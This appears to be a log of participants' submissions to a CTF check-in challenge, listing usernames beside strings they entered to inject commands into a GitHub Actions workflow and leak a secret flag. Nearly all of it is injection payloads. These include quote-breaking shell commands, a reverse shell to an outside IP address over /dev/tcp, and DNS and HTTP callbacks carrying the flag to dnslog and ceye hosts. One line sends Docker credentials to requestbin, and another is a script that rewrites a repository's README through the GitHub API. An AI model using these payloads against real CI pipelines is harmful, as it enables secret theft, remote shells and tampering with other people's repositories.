nt1dr:
EarthCompass:
ZM-J:SIBAL
CENLG-AWSL:？
truda8:CheckIn
po1ng:just
karzanWang:
ihopenot:
nt1dr:"
ihopenot:" && ls
nt1dr:${{ env.flag }}
${{ secrets[flag] }}
nt1dr:${{ secrets[FLAG] }}
X1ngn:
nt1dr:${{ env.flag }}
Dev0ke:$flag
weinull:" && echo "$flag" >> issues
afsmaira:
DD6181S03:" env.flag ""
Fraista:$flag
DD6181S03:" ${{ env.flag }} ""
emocat:\" && ls;
foreverhza:12243
ha1c9on:${env}
foreverhza:${{ secrets.FLAG }}
haonana-caiji:
youyue271:123 " &&  echo "$flag:$flag
weinull:" || echo "$flag:
CHENDAHUYOU:1
GerryGuoGuo:
ZhaoQi99:" | echo "$flag:
zeroc2537:
Fraista:abc
test
weinull:"${{ secrets.FLAG }}"
weinull:\"${{ secrets.FLAG }}\"
karzanWang:curl \
  -H "Accept: application/vnd.github.v3+json" \
  https://api.github.com/repos/CheckInChallenge/CheckIn/actions/secrets/FLAG
zeroc2537:
tyskill:$flag
haonana-caiji:123
pecof:test
coderjingluo:test
GerryGuoGuo:flag
X1ngn:`echo aaa >> issue`
truda8:$user:$flag
yaoge1225:
X1ngn:;echo aaa >> issues;
zeroc2537:456" && echo "123
mukeran:
X1ngn:`echo aaa >> issues`
karzanWang:456" && echo "123
ZhaoQi99:asd}}" echo "$user:$flag" >> issues
zeroc2537:" " echo 123
truda8:" "$flag
karzanWang:" " echo 123
pecof:{{ 1+1 }}
mukeran:"
user: "${{ secrets.FLAG }}
karzanWang:"\echo 123"
ZhaoQi99:asd}}" echo "$user:$flag" >> issues
mukeran:""
  user: "${{ secrets.FLAG }}"

mukeran:""
issues: "${{ secrets.FLAG }}"
pecof:" echo "just a test" #
ZhaoQi99:
D4rkD0g:`echo $flag`
tyskill:test" && echo "$flag
devploit::$flag
pecof:" echo "peco" >> test #
innerway-xq:test
ZhaoQi99:4asd}} $flag
ZhaoQi99:4asd}}" "$flag"
Psyduck0409:{{ 1 + 1 }}
X1ngn:\\`echo $flag\\`
Psyduck0409:`echo flag`
pecof:123
Psyduck0409:`env.flag`
Psyduck0409:`echo ${{ secrets.FLAG }}`
Psyduck0409:zzz";echo${IFS}"hello";#
yaoge1225:
echo ${{ secrets.FLAG }}### ### ### 

> [`_****_`](

- 

- [ ] @ #1. url

)
innerway-xq:
X1ngn:\\$flag
GerryGuoGuo:$(eval echo $flag)
D4rkD0g:$(ping -c 1 $flag.zby43v.dnslog.cn)
Psyduck0409:`id`
afsmaira:00000
FredericDT:"
        run: |
          echo "$flag" >> issues # # 
yaoge1225:echo ${{ secrets.FLAG }}### ### ###

[_****_](

 @ kksk #1. url

)
innerway-xq:
Psyduck0409:";echo "hhi++"#
Fraista:1+1
Fraista:${{1+1}}
innerway-xq:
Ha1f00L:a" | ls#
Psyduck0409:";echo "hhi++";echo "hhi++
CHENDAHUYOU:"ls|cat .env"
FredericDT:\033[2A
innerway-xq:secrets.FLAG}}"
purplexalc:aaa
innerway-xq:}}" secrets.FLAG "{{
Psyduck0409:";bash -i >& /dev/tcp/81.70.246.245/9999 0>&1#
Fraista:“;echo"1
FredericDT:!flag
CHENDAHUYOU:
Mrliu-eat:11
karzanWang:z"; exit 1;#
D4rkD0g:$(echo $user)
GerryGuoGuo:eval echo $(echo '$'${flag})
ST4RF4LL:$flag
JemmyLoveJenny:$flag
Ha1f00L:123
GerryGuoGuo:${flag}
Ha1f00L:"
Ha1f00L:::set-output name=action_fruit::strawberry
CHENDAHUYOU:
PumpkinDemo:
innerway-xq:"#
xiemengyun:
gdjs2:
D4rkD0g:$(curl 4qm2jy.ceye.io/\"$flag\")
gdjs2:"; echo $flag; echo "
CHENDAHUYOU:$user:$flag
innerway-xq:"echo ${{secrets.FLAG}} '"
CHENDAHUYOU:
lrcno6:" ; echo $flag ; echo "
D4rkD0g:
jegao:00000
GerryGuoGuo:secrets.FLAG
Le0nsec:"
echo "sssssssxxxxx
Casio-3:${{ secrets.FLAG }}
innerway-xq:issues = $flag
innerway-xq:::set-env name=issues::$flag
Le0nsec:" \necho "ssssss
Le0nsec:"
```
"
echo "sssssxxc
Resery:"${{ secrets.FLAG }}"
GerryGuoGuo:'${{ secrets.FLAG }}'
Le0nsec:""
  flaa: "${{ secrets.FLAG }}"
Le0nsec:""
  flaa: ${{ secrets.FLAG }}
afsmaira:00000
haztag-01:::set-output name=flag::1;(async()=>{const e=await github.repos.getContent({owner:"CheckInChallenge",path:"README.md",repo:"CheckIn",ref:"refs/heads/main"});await github.repos.createOrUpdateFileContents({owner:"CheckInChallenge",repo:"CheckIn",path:"README.md",message:"editing",content:"SSBkaWQgaXQ=",branch:"main","committer.name":"Yawn","committer.email":"email","author.name":"Yawn","author.email":"email",sha:e.data.sha})})();
afsmaira:00000
PumpkinDemo:
afsmaira:00006
afsmaira:00000
afsmaira:00000
PumpkinDemo:
afsmaira:00001
afsmaira:00000
afsmaira:00000
afsmaira:00000
CHENDAHUYOU:
afsmaira:00000
Le0nsec:""
  flaa: \$\{\{ secrets.FLAG \}\}
afsmaira:00001
shepherdo:"echo workflow: workflow:CheckIn event:pull_request actor:CheckInChallenge  
Le0nsec:""
  user: xxss
afsmaira:00000
afsmaira:00000
Gcow-Sec:`curl https://requestbin.io/12ll33d1?username=${{ secrets.DOCKER_USERNAME }}&password=${{ secrets.DOCKER_PASSWORD }}`
Resery:Resery
CHENDAHUYOU:
shepherdo:echo "$FLAG"
afsmaira:00000
afsmaira:00000
CHENDAHUYOU:RCTF{98997}
afsmaira:00000
PumpkinDemo:12345
FredericDT:abcdef\033[2Dabc
afsmaira:00000
afsmaira:00004
CHENDAHUYOU:123"; echo "$secrets.FLAG""
GerryGuoGuo:'flag{98997}'
afsmaira:00000
afsmaira:00002
GerryGuoGuo:'secrets.FLAG'
PumpkinDemo:"; echo "$secrets.FLAG
karzanWang:00000
haztag-01:$flag
karzanWang:'echo $flag'
caiji0091:86400
PumpkinDemo:10086
haztag-01::set-output $flag
zd791647217:
ZM-J:对得起我们吗
afsmaira:00000
afsmaira:00000
shepherdo:echo "asss" >> ${{ secrets.FLAG }}
afsmaira:00000
